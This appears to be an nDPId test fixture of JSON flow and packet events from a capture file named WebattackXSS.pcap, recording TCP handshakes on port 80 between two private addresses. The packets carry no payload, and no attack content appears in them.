+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5655,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":3,"flow_last_seen":1499347642717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347642717,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SnRAAD4Ge2SsEAABwKgKMuf2AFDcdDFRjynESoAQAOXojwAAAQEICgE7eyMD5UyY"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5672,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347645232,"flow_last_seen":1499347645232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347645232,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59408,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5672,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":1,"flow_last_seen":1499347645232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347645232,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rz5AAD4GFpKsEAABwKgKMugQAFBzf9KmAAAAAKACchCxqQAAAgQFtAQCCAoBO32YAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5673,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":2,"flow_last_seen":1499347645232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347645232,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6BD8Et+tc3\/Sp6AScSCD1QAAAgQFtAQCCAoD5U8NATt9mAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5675,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":3,"flow_last_seen":1499347645234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347645234,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rz9AAD4GFpmsEAABwKgKMugQAFBzf9Kn\/BLfroAQAOUi3QAAAQEICgE7fZgD5U8N"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347646486,"flow_last_seen":1499347646486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347646486,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":1,"flow_last_seen":1499347646486,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347646486,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uWhAAD4GDGisEAABwKgKMugeAFCoNce5AAAAAKACchCGmQAAAgQFtAQCCAoBO37RAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":2,"flow_last_seen":1499347646486,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347646486,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6B6AVzWvqDXHuqAScSB9RgAAAgQFtAQCCAoD5VBGATt+0QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5687,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":3,"flow_last_seen":1499347646488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347646488,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uWlAAD4GDG+sEAABwKgKMugeAFCoNce6gFc1sIAQAOUcTQAAAQEICgE7ftID5VBG"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5696,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347647733,"flow_last_seen":1499347647733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647733,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5696,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":1,"flow_last_seen":1499347647733,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347647733,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8cdhAAD4GU\/isEAABwKgKMugsAFDFxvHRAAAAAKACchA9qgAAAgQFtAQCCAoBO4AJAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5697,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":2,"flow_last_seen":1499347647733,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347647733,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6CyQ1\/Exxcbx0qAScSBnHAAAAgQFtAQCCAoD5VF+ATuACQEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5699,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":3,"flow_last_seen":1499347647734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347647734,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0cdlAAD4GU\/+sEAABwKgKMugsAFDFxvHSkNfxMoAQAOUGJAAAAQEICgE7gAkD5VF+"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347513353,"flow_last_seen":1499347518754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57994,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347513353,"flow_last_seen":1499347518754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347514648,"flow_last_seen":1499347519754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58008,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347514648,"flow_last_seen":1499347519754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347517171,"flow_last_seen":1499347522754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58034,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347517171,"flow_last_seen":1499347522754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347518410,"flow_last_seen":1499347523754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58048,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347518410,"flow_last_seen":1499347523754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58048,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347519679,"flow_last_seen":1499347524756,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58062,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347519679,"flow_last_seen":1499347524756,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347522204,"flow_last_seen":1499347527756,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58088,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347522204,"flow_last_seen":1499347527756,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58088,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5715,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347650289,"flow_last_seen":1499347650289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347650289,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5715,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":1,"flow_last_seen":1499347650289,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347650289,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qjtAAD4GG5WsEAABwKgKMuhGAFAFSiizAAAAAKACchDErAAAAgQFtAQCCAoBO4KIAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5716,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":2,"flow_last_seen":1499347650290,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347650290,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6EbKc6N+BUootKAScSD\/tgAAAgQFtAQCCAoD5VP9ATuCiAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":3,"flow_last_seen":1499347650292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347650292,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qjxAAD4GG5ysEAABwKgKMuhGAFAFSii0ynOjf4AQAOWevQAAAQEICgE7gokD5VP9"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5727,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347651555,"flow_last_seen":1499347651555,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347651555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5727,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":1,"flow_last_seen":1499347651555,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347651555,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NDJAAD4GkZ6sEAABwKgKMuhUAFBjE7f2AAAAAKACchDWVQAAAgQFtAQCCAoBO4PEAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5728,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":2,"flow_last_seen":1499347651556,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347651556,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6FRdfw4zYxO396AScSASYwAAAgQFtAQCCAoD5VU6ATuDxAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5731,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":3,"flow_last_seen":1499347651561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347651561,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NDNAAD4GkaWsEAABwKgKMuhUAFBjE7f3XX8ONIAQAOWxaQAAAQEICgE7g8UD5VU6"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5748,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347654065,"flow_last_seen":1499347654065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347654065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5748,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":1,"flow_last_seen":1499347654065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347654065,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8q1xAAD4GGnSsEAABwKgKMuhuAFBOzi1kAAAAAKACchBynwAAAgQFtAQCCAoBO4Y4AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5749,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":2,"flow_last_seen":1499347654065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347654065,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6G55d2lhTs4tZaAScSA1EwAAAgQFtAQCCAoD5VetATuGOAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5751,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":3,"flow_last_seen":1499347654068,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347654068,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0q11AAD4GGnusEAABwKgKMuhuAFBOzi1leXdpYoAQAOXUGQAAAQEICgE7hjkD5Vet"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347655367,"flow_last_seen":1499347655367,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347655367,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":1,"flow_last_seen":1499347655367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347655367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wQ9AAD4GBMGsEAABwKgKMuh8AFCmFkZxAAAAAKACchAA9gAAAgQFtAQCCAoBO4d+AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5758,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":2,"flow_last_seen":1499347655367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347655367,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6HyXTysMphZGcqAScSDioAAAAgQFtAQCCAoD5VjzATuHfgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5760,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":3,"flow_last_seen":1499347655371,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347655371,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wRBAAD4GBMisEAABwKgKMuh8AFCmFkZyl08rDYAQAOWBqAAAAQEICgE7h34D5Vjz"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347656622,"flow_last_seen":1499347656622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347656622,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":1,"flow_last_seen":1499347656622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347656622,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83x1AAD4G5rKsEAABwKgKMuiKAFBnH1eqAAAAAKACchAtbQAAAgQFtAQCCAoBO4i3AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":2,"flow_last_seen":1499347656622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347656622,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6Ios50nrZx9Xq6AScSBZZwAAAgQFtAQCCAoD5VotATuItwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5772,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":3,"flow_last_seen":1499347656624,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347656624,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03x5AAD4G5rmsEAABwKgKMuiKAFBnH1erLOdJ7IAQAOX4bQAAAQEICgE7iLgD5Vot"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347523488,"flow_last_seen":1499347528757,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58102,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 